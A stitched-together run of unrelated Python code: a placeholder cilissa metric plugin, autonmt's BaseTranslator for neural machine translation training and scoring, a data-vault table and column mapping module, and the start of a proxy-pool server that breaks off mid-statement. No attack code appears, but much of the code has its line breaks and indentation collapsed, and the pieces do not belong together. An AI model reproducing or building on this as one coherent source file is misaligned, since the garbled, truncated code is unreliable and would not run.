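# every class that subclasses cilissa.operations.Metric or Transformation
# (excluding the base classes themselves). The module below is a hypothetical
# sketch of a plugin that this check would pick up; the class body is left as
# a placeholder because the abstract hooks required by the Metric base class
# are defined elsewhere in cilissa and are not shown in this file.

# my_metric_plugin.py (hypothetical file name)
from cilissa.operations import Metric


class MyCustomMetric(Metric):
    """Placeholder metric discovered and listed by Explorer.load_plugin().

    Any abstract methods required by cilissa.operations.Metric would still
    need to be implemented; they are omitted here as an assumption.
    """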
import os.path import shutil from abc import ABC, abstractmethod from typing import List, Set from autonmt.bundle.metrics import * from autonmt.bundle.utils import * from autonmt.preprocessing.dataset import Dataset from autonmt.preprocessing.processors import normalize_file, pretokenize_file, encode_file, decode_file def _check_datasets(train_ds: Dataset = None, eval_ds: Dataset = None): # Check that train_ds is a Dataset if train_ds and not isinstance(train_ds, Dataset): raise TypeError("'train_ds' must be an instance of 'Dataset' so that we can know the layout of the trained " "model (e.g. checkpoints available, subword model, vocabularies, etc") # Check that train_ds is a Dataset if eval_ds and not isinstance(eval_ds, Dataset): raise TypeError("'eval_ds' must be an instance of 'Dataset' so that we can know the layout of the dataset " "and get the corresponding data (e.g. splits, pretokenized, encoded, stc)") # Check that the preprocessing are compatible if train_ds and eval_ds and ((train_ds.src_lang != eval_ds.src_lang) or (train_ds.trg_lang != eval_ds.trg_lang)): raise ValueError(f"The languages from the train and test datasets are not compatible:\n" f"\t- train_lang_pair=({train_ds.dataset_lang_pair})\n" f"\t- test_lang_pair=({eval_ds.dataset_lang_pair})\n") def _check_supported_metrics(metrics, metrics_supported): # Check metrics = set(metrics) metrics_supported = set(metrics_supported) # Get valid metrics metrics_valid = list(metrics.intersection(metrics_supported)) metrics_valid += [x for x in metrics if x.startswith("hg_")] # Ignore huggingface metrics metrics_valid = set(metrics_valid) metrics_non_valid = metrics.difference(metrics_valid) if metrics_non_valid: print(f"=> [WARNING] These metrics are not supported: {str(metrics_non_valid)}") if metrics == metrics_non_valid: print("\t- [Score]: Skipped. 
No valid metrics were found.") return metrics_valid class BaseTranslator(ABC): # Global variables total_runs = 0 TOOL_PARSERS = {"sacrebleu": {"filename": "sacrebleu_scores", "py": (parse_sacrebleu_json, "json")}, "bertscore": {"filename": "bertscore_scores", "py": (parse_bertscore_json, "json")}, "comet": {"filename": "comet_scores", "py": (parse_comet_json, "json")}, "beer": {"filename": "beer_scores", "py": (parse_beer_json, "json")}, "huggingface": {"filename": "huggingface_scores", "py": (parse_huggingface_json, "json")}, "fairseq": {"filename": "fairseq_scores", "py": (parse_fairseq_txt, "txt")}, } TOOL2METRICS = {"sacrebleu": {"bleu", "chrf", "ter"}, "bertscore": {"bertscore"}, "comet": {"comet"}, "beer": {"beer"}, "fairseq": {"fairseq"}, # "huggingface": "huggingface", } METRICS2TOOL = {m: tool for tool, metrics in TOOL2METRICS.items() for m in metrics} def __init__(self, engine, run_prefix="model", model_ds=None, src_vocab=None, trg_vocab=None, safe_seconds=3, **kwargs): # Store vars self.engine = engine self.run_prefix = run_prefix self.model_ds = model_ds self.config = {} self.model_ds = None self.safe_seconds = safe_seconds # Set vocab (optional) self.src_vocab = src_vocab self.trg_vocab = trg_vocab # Check dataset _check_datasets(train_ds=self.model_ds) if self.model_ds else None def _get_metrics_tool(self, metrics): tools = set() for m in metrics: if m.startswith("hg_"): m_tool = "huggingface" else: m_tool = self.METRICS2TOOL.get(m) # Add tools if m_tool: tools.add(m_tool) return tools def _add_config(self, key: str, values: dict, reset=False): def is_valid(k, v): primitive_types = (str, bool, int, float, dict, set, list) # Problems with list of objects return not(k.startswith("_") or k in {"kwargs"}) and (isinstance(v, primitive_types) or v is None) def parse_value(x): if isinstance(x, (list, set)): return [str(_x) for _x in x] return str(x) # Reset value (if needed) if reset or key not in self.config: self.config[key] = {} # Update values self.config[key].update({k: parse_value(v) for k, v in values.items() if is_valid(k, v)}) def fit(self, train_ds, max_tokens=None, batch_size=128, max_epochs=1, learning_rate=0.001, optimizer="adam", weight_decay=0, gradient_clip_val=0.0, accumulate_grad_batches=1, criterion="cross_entropy", patience=None, seed=None, devices="auto", accelerator="auto", num_workers=0, monitor="loss", resume_training=False, force_overwrite=False, **kwargs): print("=> [Fit]: Started.") # Set model self.model_ds = train_ds # Store config (and save file) self._add_config(key="fit", values=locals(), reset=False) self._add_config(key="fit", values=kwargs, reset=False) logs_path = train_ds.get_model_logs_path(toolkit=self.engine, run_name=train_ds.get_run_name(self.run_prefix)) make_dir(logs_path) save_json(self.config, savepath=os.path.join(logs_path, "config_train.json")) # Train and preprocess self.preprocess(train_ds, force_overwrite=force_overwrite, **kwargs) self.train(train_ds, max_tokens=max_tokens, batch_size=batch_size, max_epochs=max_epochs, learning_rate=learning_rate, optimizer=optimizer, weight_decay=weight_decay, gradient_clip_val=gradient_clip_val, accumulate_grad_batches=accumulate_grad_batches, criterion=criterion, patience=patience, seed=seed, devices=devices, accelerator=accelerator, num_workers=num_workers, monitor=monitor, resume_training=resume_training, force_overwrite=force_overwrite, **kwargs) def predict(self, eval_datasets: List[Dataset], beams: List[int] = None, metrics: Set[str] = None, batch_size=64, max_tokens=None, max_len_a=1.2, 
max_len_b=50, truncate_at=None, devices="auto", accelerator="auto", num_workers=0, load_best_checkpoint=False, model_ds=None, force_overwrite=False, **kwargs): print("=> [Predict]: Started.") # Set default values if beams is None: beams = [5] else: beams = list(set(beams)) beams.sort(reverse=True) # Default metrics if metrics is None: metrics = {"bleu"} else: metrics = set(metrics) # Get model dataset if model_ds: self.model_ds = model_ds elif self.model_ds: pass else: raise ValueError(f"Missing 'model_ds'. It's needed to get the model's path (training and eval).") # Store config self._add_config(key="predict", values=locals(), reset=False) self._add_config(key="predict", values=kwargs, reset=False) logs_path = self.model_ds.get_model_logs_path(toolkit=self.engine, run_name=self.model_ds.get_run_name(self.run_prefix)) make_dir(logs_path) save_json(self.config, savepath=os.path.join(logs_path, "config_predict.json")) # Translate and score eval_scores = [] eval_datasets = self.model_ds.get_eval_datasets(eval_datasets) for eval_ds in eval_datasets: self.translate(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, max_len_a=max_len_a, max_len_b=max_len_b, truncate_at=truncate_at, batch_size=batch_size, max_tokens=max_tokens, devices=devices, accelerator=accelerator, num_workers=num_workers, load_best_checkpoint=load_best_checkpoint, force_overwrite=force_overwrite, **kwargs) self.score(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, metrics=metrics, force_overwrite=force_overwrite, **kwargs) model_scores = self.parse_metrics(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, metrics=metrics, engine=self.engine, force_overwrite=force_overwrite, **kwargs) eval_scores.append(model_scores) return eval_scores @abstractmethod def _preprocess(self, *args, **kwargs): pass def preprocess(self, ds: Dataset, force_overwrite, **kwargs): print(f"=> [Preprocess]: Started. ({ds.id2(as_path=True)})") # Set vars src_lang = ds.src_lang trg_lang = ds.trg_lang train_path = ds.get_encoded_path(fname=ds.train_name) val_path = ds.get_encoded_path(fname=ds.val_name) test_path = ds.get_encoded_path(fname=ds.test_name) model_src_vocab_path = ds.get_vocab_file(lang=src_lang) model_trg_vocab_path = ds.get_vocab_file(lang=trg_lang) model_data_bin_path = ds.get_model_data_bin(toolkit=self.engine) # Create dirs make_dir([model_data_bin_path]) start_time = time.time() self._preprocess(ds=ds, src_lang=src_lang, trg_lang=trg_lang, output_path=model_data_bin_path, train_path=train_path, val_path=val_path, test_path=test_path, src_vocab_path=model_src_vocab_path, trg_vocab_path=model_trg_vocab_path, force_overwrite=force_overwrite, **kwargs) print(f"\t- [INFO]: Preprocess time: {str(datetime.timedelta(seconds=time.time()-start_time))}") @abstractmethod def _train(self, *args, **kwargs): pass def train(self, train_ds: Dataset, resume_training, force_overwrite, **kwargs): print(f"=> [Train]: Started. ({train_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=train_ds) # Check debug if is_debug_enabled(): print("\t=> [WARNING]: Debug is enabled. 
This could lead to critical problems when using a data parallel strategy.") # Set run name run_name = train_ds.get_run_name(self.run_prefix) # Set paths data_bin_path = train_ds.get_model_data_bin(toolkit=self.engine) checkpoints_dir = train_ds.get_model_checkpoints_path(toolkit=self.engine, run_name=run_name) logs_path = train_ds.get_model_logs_path(toolkit=self.engine, run_name=run_name) # Create dirs make_dir([data_bin_path, checkpoints_dir, logs_path]) # Set seed self.manual_seed(seed=kwargs.get("seed")) start_time = time.time() self._train(data_bin_path=data_bin_path, checkpoints_dir=checkpoints_dir, logs_path=logs_path, run_name=run_name, ds_alias='_'.join(train_ds.id()), resume_training=resume_training, force_overwrite=force_overwrite, **kwargs) print(f"\t- [INFO]: Training time: {str(datetime.timedelta(seconds=time.time()-start_time))}") @abstractmethod def _translate(self, *args, **kwargs): pass def translate(self, model_ds: Dataset, eval_ds: Dataset, beams: List[int], max_len_a, max_len_b, truncate_at, batch_size, max_tokens, num_workers, force_overwrite, **kwargs): print(f"=> [Translate]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! # Checkpoints dir checkpoints_dir = model_ds.get_model_checkpoints_path(self.engine, run_name) # [Trained model]: Create eval folder model_src_vocab_path = model_ds.get_vocab_file(lang=model_ds.src_lang) # Needed to preprocess model_trg_vocab_path = model_ds.get_vocab_file(lang=model_ds.trg_lang) # Needed to preprocess model_eval_data_path = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) model_eval_data_bin_path = model_ds.get_model_eval_data_bin_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) # Create dirs make_dir([model_eval_data_path, model_eval_data_bin_path]) # [Encode extern data]: Encode test data using the subword model of the trained model for ts_fname in [fname for fname in eval_ds.split_names_lang if eval_ds.test_name in fname]: lang = ts_fname.split('.')[-1] input_file = eval_ds.get_split_path(ts_fname) # as raw as possible output_file = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) # Create directories make_dir([ os.path.join(output_file, "raw"), os.path.join(output_file, "normalized"), os.path.join(output_file, "tokenized"), os.path.join(output_file, "encoded"), ]) # Copy raw raw_file = os.path.join(output_file, "raw", ts_fname) shutil.copyfile(input_file, raw_file) input_file = raw_file # Normalize data norm_file = os.path.join(output_file, "normalized", ts_fname) normalize_file(input_file=input_file, output_file=norm_file, normalizer=model_ds.normalizer, force_overwrite=force_overwrite) input_file = norm_file # Pretokenize data (if needed) if model_ds.pretok_flag: pretok_file = os.path.join(output_file, "tokenized", ts_fname) pretokenize_file(input_file=input_file, output_file=pretok_file, lang=lang, force_overwrite=force_overwrite) input_file = pretok_file # Encode file enc_file = os.path.join(output_file, "encoded", ts_fname) encode_file(ds=model_ds, input_file=input_file, output_file=enc_file, lang=lang, merge_vocabs=model_ds.merge_vocabs, truncate_at=truncate_at, force_overwrite=force_overwrite) # Preprocess external data 
test_path = os.path.join(model_eval_data_path, "encoded", eval_ds.test_name) self._preprocess(ds=model_ds, src_lang=model_ds.src_lang, trg_lang=model_ds.trg_lang, output_path=model_eval_data_bin_path, train_path=None, val_path=None, test_path=test_path, src_vocab_path=model_src_vocab_path, trg_vocab_path=model_trg_vocab_path, subword_model=model_ds.subword_model, pretok_flag=model_ds.pretok_flag, external_data=True, force_overwrite=force_overwrite, **kwargs) # Iterate over beams for beam in beams: start_time = time.time() # Create output path (if needed) output_path = model_ds.get_model_beam_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) make_dir(output_path) # Translate tok_flag = [os.path.exists(os.path.join(output_path, f)) for f in ["hyp.tok"]] if force_overwrite or not all(tok_flag): self._translate( src_lang=model_ds.src_lang, trg_lang=model_ds.trg_lang, beam_width=beam, max_len_a=max_len_a, max_len_b=max_len_b, batch_size=batch_size, max_tokens=max_tokens, data_bin_path=model_eval_data_bin_path, output_path=output_path, checkpoints_dir=checkpoints_dir, model_src_vocab_path=model_src_vocab_path, model_trg_vocab_path=model_trg_vocab_path, num_workers=num_workers, model_ds=model_ds, force_overwrite=force_overwrite, **kwargs) # Copy src/ref raw for fname, lang in [("src", model_ds.src_lang), ("ref", model_ds.trg_lang)]: raw_file = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, fname=f"normalized/test.{lang}") output_file = os.path.join(output_path, f"{fname}.txt") shutil.copyfile(raw_file, output_file) # Postprocess tokenized files for fname, lang in [("hyp", model_ds.trg_lang)]: input_file = os.path.join(output_path, f"{fname}.tok") output_file = os.path.join(output_path, f"{fname}.txt") model_vocab_path = model_src_vocab_path if lang == model_ds.src_lang else model_trg_vocab_path # Post-process files decode_file(input_file=input_file, output_file=output_file, lang=lang, subword_model=model_ds.subword_model, pretok_flag=model_ds.pretok_flag, model_vocab_path=model_vocab_path, remove_unk_hyphen=True, force_overwrite=force_overwrite) # Check amount of lines ref_lines = len(open(os.path.join(output_path, "ref.txt"), 'r').readlines()) hyp_lines = len(open(os.path.join(output_path, "hyp.txt"), 'r').readlines()) if ref_lines != hyp_lines: raise ValueError(f"The number of lines in 'ref.txt' ({ref_lines}) and 'hyp.txt' ({hyp_lines}) " f"does not match. If you see a 'CUDA out of memory' message, try again with " f"smaller batch.") print(f"\t- [INFO]: Translating time (beam={str(beam)}): {str(datetime.timedelta(seconds=time.time() - start_time))}") def score(self, model_ds: Dataset, eval_ds: Dataset, beams: List[int], metrics: Set[str], force_overwrite, **kwargs): print(f"=> [Score]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Check supported metrics metrics_valid = _check_supported_metrics(metrics, self.METRICS2TOOL.keys()) if not metrics_valid: return # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! 
# Iterate over beams for beam in beams: start_time = time.time() # Paths beam_path = model_ds.get_model_beam_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) scores_path = model_ds.get_model_scores_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) # Create dirs make_dir([scores_path]) # Set input files (results) src_file_path = os.path.join(beam_path, "src.txt") ref_file_path = os.path.join(beam_path, "ref.txt") hyp_file_path = os.path.join(beam_path, "hyp.txt") # Check that the paths exists if not all([os.path.exists(p) for p in [src_file_path, ref_file_path, hyp_file_path]]): raise IOError("Missing files to compute scores") # Score: bleu, chrf and ter if self.TOOL2METRICS["sacrebleu"].intersection(metrics): output_file = os.path.join(scores_path, f"sacrebleu_scores.json") if force_overwrite or not os.path.exists(output_file): compute_sacrebleu(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file, metrics=metrics) # Score: bertscore if self.TOOL2METRICS["bertscore"].intersection(metrics): output_file = os.path.join(scores_path, f"bertscore_scores.json") if force_overwrite or not os.path.exists(output_file): compute_bertscore(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file, trg_lang=model_ds.trg_lang) # Score: comet if self.TOOL2METRICS["comet"].intersection(metrics): output_file = os.path.join(scores_path, f"comet_scores.json") if force_overwrite or not os.path.exists(output_file): compute_comet(src_file=src_file_path, ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file) # Score: fairseq if self.TOOL2METRICS["fairseq"].intersection(metrics): output_file = os.path.join(scores_path, f"fairseq_scores.txt") if force_overwrite or not os.path.exists(output_file): compute_fairseq(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file) # Huggingface metrics hg_metrics = {x[3:] for x in metrics if x.startswith("hg_")} if hg_metrics: output_file = os.path.join(scores_path, f"huggingface_scores.json") if force_overwrite or not os.path.exists(output_file): compute_huggingface(src_file=src_file_path, hyp_file=hyp_file_path, ref_file=ref_file_path, output_file=output_file, metrics=hg_metrics, trg_lang=model_ds.trg_lang) print(f"\t- [INFO]: Scoring time (beam={str(beam)}): {str(datetime.timedelta(seconds=time.time() - start_time))}") def parse_metrics(self, model_ds, eval_ds, beams: List[int], metrics: Set[str], force_overwrite, **kwargs): print(f"=> [Parsing]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Check supported metrics metrics_valid = _check_supported_metrics(metrics, self.METRICS2TOOL.keys()) if not metrics_valid: return # Metrics to retrieve metric_tools = self._get_metrics_tool(metrics) # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! 
# Walk through beams scores = { "engine": kwargs.get("engine"), "lang_pair": model_ds.dataset_lang_pair, "train_dataset": model_ds.dataset_name, "eval_dataset": eval_ds.dataset_name, "subword_model": str(model_ds.subword_model).lower(), "vocab_size": str(model_ds.vocab_size).lower(), "run_name": run_name, "train_max_lines": model_ds.dataset_lines, "beams": {}, "config": self.config, } # Iterate over beams for beam in beams: # Paths scores_path = model_ds.get_model_scores_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) # Walk through metric files beam_scores = {} for m_tool in metric_tools: values = self.TOOL_PARSERS[m_tool] m_parser, ext = values["py"] m_fname = f"{values['filename']}.{ext}" # Read file filename = os.path.join(scores_path, m_fname) if os.path.exists(filename): try: with open(filename, 'r') as f: m_scores = m_parser(text=f.readlines()) for m_name, m_values in m_scores.items(): # [bleu_score, chrf_score, ter_score], [bertscore_precision] for score_name, score_value in m_values.items(): m_name_full = f"{m_tool}_{m_name}_{score_name}".lower().strip() beam_scores[m_name_full] = score_value except Exception as e: print(f"\t- [PARSING ERROR]: ({m_fname}) {str(e)}") else: print(f"\t- [WARNING]: There are no metrics from '{m_tool}'") # Add beam scores scores["beams"].update({f"beam{str(beam)}": beam_scores}) return scores @staticmethod def manual_seed(seed, use_deterministic_algorithms=False): import torch import random import numpy as np from pytorch_lightning.utilities.seed import seed_everything # Define seed seed = seed if seed is not None else int(time.time()) % 2**32 # Set seeds random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) seed_everything(seed) # Tricky: https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html torch.use_deterministic_algorithms(use_deterministic_algorithms) # Test randomness print(f"\t- [INFO]: Testing random seed ({seed}):") print(f"\t\t- random: {random.random()}") print(f"\t\t- numpy: {np.random.rand(1)}") print(f"\t\t- torch: {torch.rand(1)}") return seed
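A hedged sketch of how a concrete toolkit could plug into BaseTranslator (the DummyTranslator name and the dataset variables are placeholders, not part of autonmt): only the three abstract hooks need implementations, after which fit and predict drive the preprocess, train, translate and score pipeline defined above.

class DummyTranslator(BaseTranslator):
    """Illustrative no-op engine; each hook receives the paths prepared by BaseTranslator."""

    def _preprocess(self, *args, **kwargs):
        pass  # e.g. binarize the train/val/test files into kwargs["output_path"]

    def _train(self, *args, **kwargs):
        pass  # e.g. run the toolkit's training loop, writing to kwargs["checkpoints_dir"]

    def _translate(self, *args, **kwargs):
        pass  # e.g. beam-search decode into kwargs["output_path"] as "hyp.tok"

# translator = DummyTranslator(engine="dummy", run_prefix="model")
# translator.fit(train_ds, max_epochs=10, batch_size=128)                 # train_ds: a Dataset instance
# scores = translator.predict([test_ds], metrics={"bleu"}, beams=[5], model_ds=train_ds)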
import csv, re from os import path from pathlib import Path from itertools import groupby from .dbobjects import Column, Table, Schema, create_typed_table, MetaDataError, MetaDataWarning TRANSFORM_PARAM_RE = re.compile(r"\$(\d+)") class TableMappings(list): def __init__(self, table_mappings): super().__init__(table_mappings) @classmethod def read(cls, path): paths = Path(path).glob('*.csv') table_mappings = [] for path in paths: with open(path, encoding='utf-8') as mappings_file: table_mappings += list(csv.DictReader(mappings_file, delimiter=',')) return TableMappings(table_mappings) def from_table(self, schema, table): return TableMappings([ mapping for mapping in self if mapping['source_schema'] == schema and mapping['source_table'] == table ]) def to_table(self, schema, table): return TableMappings([ mapping for mapping in self if mapping['target_schema'] == schema and mapping['target_table'] == table ]) def print_mappings(self): for mapping in self: print('{source_schema}.{source_table}\t{source_filter}\t{target_schema}.{target_table}'.format(**mapping)) class ColumnMappings(list): def __init__(self, column_mappings): super().__init__(column_mappings) @classmethod def read(cls, path): paths = Path(path).glob('*.csv') column_mappings = [] for path in paths: with open(path, encoding='utf-8') as mappings_file: column_mappings += [m for m in csv.DictReader(mappings_file, dialect=csv.excel) if not m['src_schema'].startswith('--')] return ColumnMappings(column_mappings) def from_table(self, schema, table): return ColumnMappings([ mapping for mapping in self if mapping['src_schema'] == schema and mapping['src_table'] == table ]) def to_table(self, schema, table): return ColumnMappings([ mapping for mapping in self if mapping['tgt_schema'] == schema and mapping['tgt_table'] == table ]) def from_column(self, schema, table, column): return ColumnMappings([ mapping for mapping in self if mapping['src_schema'] == schema and mapping['src_table'] == table and mapping['src_column'] == column ]) def to_column(self, schema=None, table=None, column=None): if isinstance(column, Column): schema = column.parent.schema table = column.parent.name column = column.name return ColumnMappings([ mapping for mapping in self if mapping['tgt_schema'] == schema and mapping['tgt_table'] == table and mapping['tgt_column'] == column ]) def to_column_list(self, column): column_mappings = self.to_column(column.parent.schema, column.parent.name, column.name) return [{ 'source_full_name': '{src_schema}.{src_table}.{src_column}'.format(**column_mapping), 'source': '{src_column}'.format(**column_mapping), 'transformation': column_mapping['transformation'] } for column_mapping in column_mappings] def source_tables(self): schema_table_name = lambda m: [m['src_schema'], m['src_table']] table_groups = groupby(sorted(self, key=schema_table_name), key=schema_table_name) tables = [ create_typed_table(Table( key[0], key[1], [Column(column, None, None) for column in set(m['src_column'] for m in group)], None )) for key, group in table_groups] return tables def target_tables(self): schema_table_name = lambda m: [m['tgt_schema'], m['tgt_table']] table_groups = groupby(sorted(self, key=schema_table_name), key=schema_table_name) tables = [ create_typed_table(Table( key[0], key[1], [Column(column, None, None) for column in dict.fromkeys(m['tgt_column'] for m in group)], # order preserving dedup None )) for key, group in table_groups] return tables def print_mappings(self): for mapping in self: 
print('{src_schema}.{src_table}.{src_column}\t{transformation}\t{tgt_schema}.{tgt_table}.{tgt_column}'.format(**mapping)) def apply_transform(column_names, transform, prefix): if prefix: column_names = ["{}.{}".format(prefix, column_name) for column_name in column_names] if transform: # params = TRANSFORM_PARAM_RE.findall(transform) return TRANSFORM_PARAM_RE.sub(lambda s: column_names[int(s.group(1)) - 1], transform) else: return ';'.join(column_names) class Mappings: def __init__(self, table_mappings, column_mappings, tables): self.table_mappings = table_mappings self.column_mappings = column_mappings self.tables = tables self._table_dict = dict((table.full_name, table) for table in tables) def source_tables(self, target_table): source_mappings = self.table_mappings.to_table(target_table.schema, target_table.name) source_table_names = ['{source_schema}.{source_table}'.format(**m) for m in source_mappings] source_tables = [self._table_dict.get(table_name) for table_name in source_table_names] return [source_table for source_table in source_tables if source_table] def source_table(self, target_table): source_tables = self.source_tables(target_table) if len(source_tables) > 0: return source_tables[0] else: return None def filter(self, source_table, target_table): mappings = (self.table_mappings .from_table(source_table.schema, source_table.name) .to_table(target_table.schema, target_table.name) ) try: return mappings[0]['source_filter'] except IndexError: return None def source_columns(self, source_table, target_column, prefix=None): if target_column: target_table = target_column.parent source_column_mappings = self.column_mappings.to_table(target_table.schema, target_table.name) if source_table: target_column_mappings = source_column_mappings.from_table(source_table.schema, source_table.name) else: target_column_mappings = source_column_mappings source_maps = target_column_mappings.to_column_list(target_column) result = [ apply_transform(source_map['source'].split(';'), source_map['transformation'], prefix) for source_map in source_maps ] return result else: return [] def source_column(self, source_table, target_column, prefix=None): source_columns = self.source_columns(source_table, target_column, prefix) if len(source_columns) > 0: return source_columns[0] else: return None def source_column_objects(self, target_column, source_table=None): source_column_mappings = self.column_mappings.to_column(column=target_column) if source_table: source_column_mappings = source_column_mappings.from_table(source_table.schema, source_table.name) result = [ self._table_dict[f"{m['src_schema']}.{m['src_table']}"][m['src_column']] for m in source_column_mappings ] return result def source_column_object(self, target_column, source_table=None): source_columns = self.source_column_objects(target_column, source_table) if len(source_columns) > 0: return source_columns[0] else: return None def check(self, target_table): source_mappings = self.table_mappings.to_table(target_table.schema, target_table.name) source_table_names = ['{source_schema}.{source_table}'.format(**m) for m in source_mappings] if len(source_mappings) == 0: raise MetaDataError('There is no table mappings to {target_table_name}'.format( target_table_name=target_table.full_name )) source_tables = self.source_tables(target_table) if len(source_tables) == 0: raise MetaDataError('There is no column mappings to {target_table_name} from {source_table_names}'.format( target_table_name=target_table.full_name, source_table_names=', 
'.join(source_table_names) )) for target_column in target_table.columns: # print(target_column) if target_table.table_type in ['version_pointer']: src_columns = self.column_mappings.to_column(target_table.schema, target_table.name, target_column.name) if len(src_columns) < 1: raise MetaDataError(f'There is no mapping to {target_column.full_name}') else: for source_table in source_tables: # print(source_table.full_name) source_column = self.source_column(source_table, target_column) # print(source_column) if source_column == None: raise MetaDataError('There is no mapping to {target_column_name} from {source_table_name}'.format( target_column_name=target_column.full_name, source_table_name=source_table.full_name )) def path(self, vp): source_tables = set(l.full_name for l in self.source_tables(vp)) metrics_mapping = self.column_mappings.to_column(vp.schema, vp.name, vp.metrics_key.name)[0] context_mapping = self.column_mappings.to_column(vp.schema, vp.name, vp.context_key.name)[0] current_column = vp.parent[metrics_mapping['src_table']][metrics_mapping['src_column']] goal_column = vp.parent[context_mapping['src_table']][context_mapping['src_column']] # print('goal:', goal_column.full_name) path_ = [current_column] seen = set([current_column.full_name]) while current_column.full_name != goal_column.full_name: # print('current:', current_column.full_name) current_table = current_column.parent if current_table.table_type == 'hub': goals = [ sat.key for sat in current_table.related_satellites if sat.key.full_name not in seen and sat.key == goal_column ] if goals: current_column = goals[0] else: columns = [ fk.columns[0] for l in current_table.related_links for fk in l.fks if l.full_name in source_tables and fk.columns[0].full_name not in seen and fk.foreign_table_name == current_table.name ] if columns: current_column = columns[0] else: raise MetaDataError(f'No link from {current_column.full_name}') elif current_table.table_type == 'link': columns = [ (fk.foreign_columns[0], fk.columns[0]) for fk in current_table.fks if fk.columns[0].full_name not in seen and fk.foreign_table.full_name in source_tables ] if columns: (current_column, link_key) = columns[0] path_.append(link_key) seen.add(link_key.full_name) else: raise MetaDataError(f'No hub from {current_column.full_name}') elif current_table.table_type == 'satellite': current_column = current_table.related_hub[0].key else: raise MetaDataError(f'Wrong type, table={current_table} should not be in a vp path') path_.append(current_column) seen.add(current_column.full_name) return path_ def link_path(self, vp): link_columns = [c for c in self.path(vp) if c.parent.table_type == 'link'] grouped = [list(g) for _, g in groupby(link_columns, lambda c: c.parent.name)] return grouped
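# A minimal, self-contained sketch of the "$n" placeholder substitution that
# apply_transform performs for the column-mapping CSVs above. The transform
# string, column names, and the "src" alias below are hypothetical examples;
# real values come from the `transformation` field read by ColumnMappings.read.
import re

_PARAM_RE = re.compile(r"\$(\d+)")

def substitute(transform, source_columns, prefix=None):
    # Same rule as apply_transform: $1 is the first source column, $2 the
    # second, and so on; without a transform the columns are joined with ';'.
    if prefix:
        source_columns = [f"{prefix}.{c}" for c in source_columns]
    if transform:
        return _PARAM_RE.sub(lambda m: source_columns[int(m.group(1)) - 1], transform)
    return ';'.join(source_columns)

print(substitute("COALESCE($1, $2)", ["first_name", "nick_name"], prefix="src"))
# -> COALESCE(src.first_name, src.nick_name)
print(substitute(None, ["first_name", "nick_name"]))
# -> first_name;nick_name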
import asyncio import heapq import time from .errors import ( BadResponseError, BadStatusError, BadStatusLine, ErrorOnStream, NoProxyError, ProxyConnError, ProxyEmptyRecvError, ProxyRecvError, ProxySendError, ProxyTimeoutError, ResolveError, ) from .resolver import Resolver from .utils import log, parse_headers, parse_status_line CONNECTED = b'HTTP/1.1 200 Connection established\r\n\r\n' class ProxyPool: """Imports and gives proxies from queue on demand.""" def __init__( self, proxies, min_req_proxy=5, max_error_rate=0.5, max_resp_time=8, min_queue=5, strategy='best', ): self._proxies = proxies self._pool = [] self._newcomers = [] self._strategy = strategy self._min_req_proxy = min_req_proxy # if num of errors greater or equal 50% - proxy will be remove from pool self._max_error_rate = max_error_rate self._max_resp_time = max_resp_time self._min_queue = min_queue if strategy != 'best': raise ValueError('`strategy` only support `best` for now.') async def get(self, scheme): scheme = scheme.upper() if len(self._pool) + len(self._newcomers) < self._min_queue: chosen = await self._import(scheme) elif len(self._newcomers) > 0: chosen = self._newcomers.pop(0) elif self._strategy == 'best': for priority, proxy in self._pool: if scheme in proxy.schemes: chosen = proxy self._pool.remove((proxy.priority, proxy)) break else: chosen = await self._import(scheme) return chosen async def _import(self, expected_scheme): while True: proxy = await self._proxies.get() self._proxies.task_done() if not proxy: raise NoProxyError('No more available proxies') elif expected_scheme not in proxy.schemes: self.put(proxy) else: return proxy def put(self, proxy): is_exceed_time = (proxy.error_rate > self._max_error_rate) or ( proxy.avg_resp_time > self._max_resp_time ) if proxy.stat['requests'] < self._min_req_proxy: self._newcomers.append(proxy) elif proxy.stat['requests'] >= self._min_req_proxy and is_exceed_time: log.debug('%s:%d removed from proxy pool' % (proxy.host, proxy.port)) else: heapq.heappush(self._pool, (proxy.priority, proxy)) log.debug('%s:%d stat: %s' % (proxy.host, proxy.port, proxy.stat)) def remove(self, host, port): for proxy in self._newcomers: if proxy.host == host and proxy.port == port: chosen = proxy self._newcomers.remove(proxy) break else: for priority, proxy in self._pool: if proxy.host == host and proxy.port == port: chosen = proxy self._pool.remove((proxy.priority, proxy)) break return chosen class Server: """Server distributes incoming requests to a pool of found proxies.""" def __init__( self, host, port, proxies, timeout=8, max_tries=3, min_req_proxy=5, max_error_rate=0.5, max_resp_time=8, prefer_connect=False, http_allowed_codes=None, backlog=100, loop=None, **kwargs ): self.host = host self.port = 